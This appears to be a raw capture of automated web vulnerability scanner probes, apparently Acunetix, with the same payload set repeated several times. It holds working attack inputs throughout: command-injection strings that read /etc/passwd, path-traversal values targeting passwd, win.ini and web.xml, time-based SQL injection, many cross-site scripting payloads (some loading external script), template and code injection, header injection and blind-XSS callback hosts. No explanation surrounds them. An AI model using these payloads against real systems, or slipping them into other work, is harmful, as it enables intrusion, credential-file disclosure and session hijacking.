acu8592\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8592

cat /etc/passwd

1

1

1

1

acux6997\xc0\xbez1\xc0\xbcz2a\x90bcxuca6997

1

..\..\..\..\..\..\..\..\windows\win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3.281),0)/*'XOR(if(now()=sysdate(),sleep(3.281),0))OR'"XOR(if(now()=sysdate(),sleep(3.281),0))OR"*/

`cat /etc/passwd`

1

1

1

(select(0)from(select(sleep(3.281)))v)/*'+(select(0)from(select(sleep(3.281)))v)+'"+(select(0)from(select(sleep(3.281)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1<ScRiPt >prompt(935235)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

-1

1

${99546+100365}

|cat /etc/passwd#

1

1

-1)

1

1<script>prompt(981424)</script>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'|'ld

1

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(949942)</ScRiPt>

1

1&n924275=v904484

WKBSfQW9'

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

1

fyocx2ZW')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947121></ScRiPt>

)

1

1

1

1some_inexistent_file_with_long_name%00.jpg

zZgQvAfs'))

WEB-INF/web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1<ScRiPt >prompt(932035)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

-1

'"()

1<video><source onerror="javascript:prompt(971267)">

/etc/passwd

WEB-INF\web.xml

^(#$!@#$)(()))******

testasp.vulnweb.com

"

1

1

-1)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925980)"></g></svg>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

||cat /etc/passwd

1

1<div style=width:expression(prompt(927909))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Tvwpqmid'

1

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<iframe src='data:text/html

1

'&dir&'

1

'

1

KDiwRXYv')

1

1

1<body onload=prompt(932433)>

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

U06MqLQP'))

1

"&dir&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968541)>

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hitAuXkvBYGkr.bxss.me/

1

1

1<img src=xyz OnErRor=prompt(951982)>

1

acunetix_wvs_invalid_filename

1

|dir

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1<img/src=">" onerror=alert(909074)>

comments

WEB-INF/web.xml

'|dir

1

1

1

1<ScRiPt%20>prompt(913732)</sCripT>

1

comments

1

http://www.acunetix.tst

1&lt

"|dir

1

'"

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(909703)</ScRiPt>

comments/.

1

\xf6<img acu onmouseover=prompt(921686) //\xf6>

'"()&%<ScRiPt >prompt(982693)</ScRiPt>

1

<!--

1

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(941752)>

1

1_970839

1

1

1

1

1

1

../../../../../../../../../../boot.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

1

1

1

response.write(9958322*9896111)

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1_9rtUC <ScRiPt >prompt(936411)</ScRiPt>

1

'+response.write(9958322*9896111)+'

1

acu10577\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10577

1

1

................windowswin.ini

1

&cat /etc/passwd&

acux10218\xc0\xbez1\xc0\xbcz2a\x90bcxuca10218

1

1

"+response.write(9958322*9896111)+"

'&cat /etc/passwd&'

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(974693)</ScRiPt>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(948217)</script>

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1<ScRiPt >prompt(935231)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971087></ScRiPt>

`cat /etc/passwd`

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

${99794+100403}

-1)

|cat /etc/passwd#

1<ScRiPt >prompt(949817)</ScRiPt>

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

WEB-INF/web.xml

'|'ld

1

1<video><source onerror="javascript:prompt(947221)">

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

V7X2ophk'

1

1&n944454=v963045

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981295)"></g></svg>

)

WEB-INF\web.xml

1some_inexistent_file_with_long_name%00.jpg

eq3uBDev')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<div style=width:expression(prompt(975776))>

1

jZQJ2l1S'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

'

1<iframe src='data:text/html

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1

1<body onload=prompt(950089)>

1

/etc/passwd

-1)

'"()

"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957501)>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

1

1<img src=xyz OnErRor=prompt(976904)>

1

1

1

||cat /etc/passwd

1

1

1<img/src=">" onerror=alert(913407)>

EjQeUX06'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

1

1

1

1<ScRiPt%20>prompt(915074)</sCripT>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

HtFqjCpT')

1&lt

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

1

1

oUJranQ0'))

'

\xf6<img acu onmouseover=prompt(916533) //\xf6>

1

acunetix_wvs_invalid_filename

1

"&dir&"

http://hito9ZRTYmR81.bxss.me/

"

1

comments

1<input autofocus onfocus=prompt(989880)>

file:///etc/passwd

1

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}

1

comments

<a href='http://www.acunetix.com'>website security</a>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

[url=http://www.acunetix.com]website security[/url]

1

'|dir

1

1

WEB-INF/web.xml

1

1

1_O0WCV <ScRiPt >prompt(906680)</ScRiPt>

"|dir

'"

1

http://www.acunetix.tst

1

WEB-INF\web.xml

1

1

1'"()&%<ScRiPt >prompt(905463)</ScRiPt>

1

1

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(901923)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

1_913412

1

1

1

1

1

1

1

&cat /etc/passwd&

1

response.write(9497231*9338471)

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'+response.write(9497231*9338471)+'

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9497231*9338471)+"

................windowswin.ini

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

acu10756\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10756

1

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

acux6904\xc0\xbez1\xc0\xbcz2a\x90bcxuca6904

1

|cat /etc/passwd#

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(905234)</ScRiPt>

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'|'ld

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${99901+99658}

1<script>prompt(965793)</script>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1<ScRiPt >prompt(961899)</ScRiPt>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n954864=v989051

-1))

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975435></ScRiPt>

)

1

/etc/passwd

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

'

IImAma2H'

1<ScRiPt >prompt(947660)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

!(()&&!|*|*|

1

testasp.vulnweb.com

"

WEB-INF\web.xml

B2he3BFS')

1<video><source onerror="javascript:prompt(966823)">

1

1

^(#$!@#$)(()))******

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

b2lzyERn'))

1

'"()

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979485)"></g></svg>

||cat /etc/passwd

-1

1

1

1

1

1<div style=width:expression(prompt(917981))>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

1

1

1

-1)

1<iframe src='data:text/html

'&dir&'

1

1

1

1

-1))

1<body onload=prompt(945103)>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

file:///etc/passwd

1

"&dir&"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927475)>

fFuU73eF'

1

1

http://hit2N13g94diT.bxss.me/

|dir

'

/\../\../\../\../\../\../\../etc/passwd

1

acunetix_wvs_invalid_filename

1

1

1<img src=xyz OnErRor=prompt(917824)>

wK2f1q5K')

comments

WEB-INF/web.xml

'|dir

1

"

1<img/src=">" onerror=alert(992314)>

Bl39WkUd'))

1

1

1

comments

1

${@print(md5(acunetix_wvs_security_test))}

"|dir

WEB-INF\web.xml

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

http://www.acunetix.tst

1<ScRiPt%20>prompt(950167)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1&lt

1

1

1

1

1

1

'"

1'"()&%<ScRiPt >prompt(999796)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

\xf6<img acu onmouseover=prompt(970717) //\xf6>

<!--

1

1

'"()&%<ScRiPt >prompt(930247)</ScRiPt>

1

1

1<input autofocus onfocus=prompt(988586)>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1_953729

1

1

1

1

response.write(9356699*9636977)

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

1

................windowswin.ini

&cat /etc/passwd&

1

[url=http://www.acunetix.com]website security[/url]

'+response.write(9356699*9636977)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

"+response.write(9356699*9636977)+"

1

1_rCIMu <ScRiPt >prompt(952920)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

acu10908\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10908

1

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

1

1

1

acux1775\xc0\xbez1\xc0\xbcz2a\x90bcxuca1775

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

cat /etc/passwd

1

1

1<ScRiPt >prompt(946364)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

1

1

1

1<script>prompt(953485)</script>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

${100048+100032}

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<ScRiPt >prompt(981519)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981068></ScRiPt>

1

1&n957501=v993546

-1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF/web.xml

1<ScRiPt >prompt(963347)</ScRiPt>

-1)

1

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<video><source onerror="javascript:prompt(924559)">

WEB-INF\web.xml

-1))

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

9kor6ZL3'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(917688)"></g></svg>

'

1

'"()

1

1

1

1

l7gHiDC2')

1<div style=width:expression(prompt(941118))>

1

"

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<iframe src='data:text/html

W7Vo4eDp'))

1

1

||cat /etc/passwd

1

1

1

1

-1

1

/etc/passwd

1<body onload=prompt(915822)>

1

&dir

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982361)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

acunetix_wvs_invalid_filename

'&dir&'

http://hitFTdklGa8g2.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1<img src=xyz OnErRor=prompt(956510)>

-1))

1

1

"&dir&"

1

1

comments

jMMobNBZ'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(933521)>

fBRKKLzW')

|dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

Yttdd0l3'))

${@print(md5(acunetix_wvs_security_test))}\

1

1<ScRiPt%20>prompt(995728)</sCripT>

1

1

comments/.

'|dir

http://www.acunetix.tst

1

file:///etc/passwd

1&lt

1

'"

1

1

"|dir

1

1

<!--

/\../\../\../\../\../\../\../etc/passwd

\xf6<img acu onmouseover=prompt(955462) //\xf6>

1

1

1

1

1

1

1

WEB-INF/web.xml

1<input autofocus onfocus=prompt(948460)>

1

1

1

1

1

1

WEB-INF\web.xml

response.write(9380099*9069556)

1'"()&%<ScRiPt >prompt(900930)</ScRiPt>

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

&cat /etc/passwd&

1

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(922444)</ScRiPt>

'+response.write(9380099*9069556)+'

../../../../../../../../../../windows/win.ini

1

1

1

1_LtiSz <ScRiPt >prompt(995271)</ScRiPt>

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

"+response.write(9380099*9069556)+"

1

1_952242

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

................windowswin.ini

|cat /etc/passwd#

acu2585\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2585

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

'|'ld

acux7053\xc0\xbez1\xc0\xbcz2a\x90bcxuca7053

1

1

1

-1

${100086+99819}

../../../../../../../../../../etc/passwd.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(987724)</ScRiPt>

"|"ld

-1)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n935433=v991813

1

-1))

1<script>prompt(906941)</script>

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(915022)</ScRiPt>

1

SV3C5goS'

'

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

MXPdbB6m')

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914539></ScRiPt>

'"()

"

1

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

1<ScRiPt >prompt(932042)</ScRiPt>

1

AQQsZyvC'))

1

WEB-INF/web.xml

1

/etc/passwd

1

1

&dir

1<video><source onerror="javascript:prompt(970902)">

-1

1

1

WEB-INF\web.xml

'&dir&'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928418)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<div style=width:expression(prompt(967095))>

"&dir&"

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

1

|dir

1

1

1<iframe src='data:text/html

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

"

XSTFqkpM'

1

1

1<body onload=prompt(949004)>

http://hitb2o9b5Gbii.bxss.me/

'|dir

1

${@print(md5(acunetix_wvs_security_test))}

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944096)>

HkFuwspy')

"|dir

1

1

comments

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1

1<img src=xyz OnErRor=prompt(959439)>

'"

AosgUpOi'))

1

1

1'"()&%<ScRiPt >prompt(933561)</ScRiPt>

1

comments/.

1

<!--

1<img/src=">" onerror=alert(909245)>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(951394)</ScRiPt>

1

WEB-INF/web.xml

response.write(9428080*9716615)

1

1<ScRiPt%20>prompt(916813)</sCripT>

1

1

1_966900

1

1

'+response.write(9428080*9716615)+'

1

1

1&lt

WEB-INF\web.xml

1

1

"+response.write(9428080*9716615)+"

1

1

../../../../../../../../../../windows/win.ini

\xf6<img acu onmouseover=prompt(973221) //\xf6>

1

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(973433)>

1

1

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini.jpg

<a href='http://www.acunetix.com'>website security</a>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

[url=http://www.acunetix.com]website security[/url]

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1_LIE1w <ScRiPt >prompt(925969)</ScRiPt>

................windowswin.ini

acu4908\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4908

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acux6368\xc0\xbez1\xc0\xbcz2a\x90bcxuca6368

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(975210)</ScRiPt>

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1<script>prompt(941443)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99403+100429}

1

1

-1)

1

1<ScRiPt >prompt(980466)</ScRiPt>

|cat /etc/passwd#

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1

1

1

xVcHbcf4'

'|'ld

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944093></ScRiPt>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

fCo1UEjE')

1

1&n918392=v936379

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1some_inexistent_file_with_long_name%00.jpg

WEB-INF/web.xml

1<ScRiPt >prompt(987181)</ScRiPt>

"|"ld

1

3MHeVIFS'))

/etc/passwd

1

1

1

1<video><source onerror="javascript:prompt(966335)">

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1

WEB-INF\web.xml

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

testasp.vulnweb.com

1

)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959327)"></g></svg>

'

1

-1)

1

1

!(()&&!|*|*|

1<div style=width:expression(prompt(999736))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

-1))

1

1

1

'"()

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

zylc1P0D'

1

^(#$!@#$)(()))******

1<iframe src='data:text/html

1

1

1

1

8ObxESKC')

1<body onload=prompt(996991)>

1

&dir

1

1

vhcbWQlB'))

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(940676)>

'&dir&'

file:///etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1<img src=xyz OnErRor=prompt(914810)>

1

1

1

"&dir&"

1

"

1

/\../\../\../\../\../\../\../etc/passwd

1<img/src=">" onerror=alert(916263)>

1

1

1

acunetix_wvs_invalid_filename

|dir

http://hitajzv84Wo6P.bxss.me/

WEB-INF/web.xml

1

1<ScRiPt%20>prompt(982013)</sCripT>

${@print(md5(acunetix_wvs_security_test))}

1

'|dir

comments

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1&lt

WEB-INF\web.xml

comments

1

1

http://www.acunetix.tst

1

"|dir

comments/.

\xf6<img acu onmouseover=prompt(975749) //\xf6>

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

'"

1

1<input autofocus onfocus=prompt(903575)>

1

1

1

1'"()&%<ScRiPt >prompt(907054)</ScRiPt>

1

1

<!--

<a href='http://www.acunetix.com'>website security</a>

1

1

1

response.write(9259115*9639132)

1

'"()&%<ScRiPt >prompt(900685)</ScRiPt>

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../boot.ini

1

1

1

1

'+response.write(9259115*9639132)+'

1

1_998729

1_YKuKi <ScRiPt >prompt(999476)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

"+response.write(9259115*9639132)+"

1

1

1

1

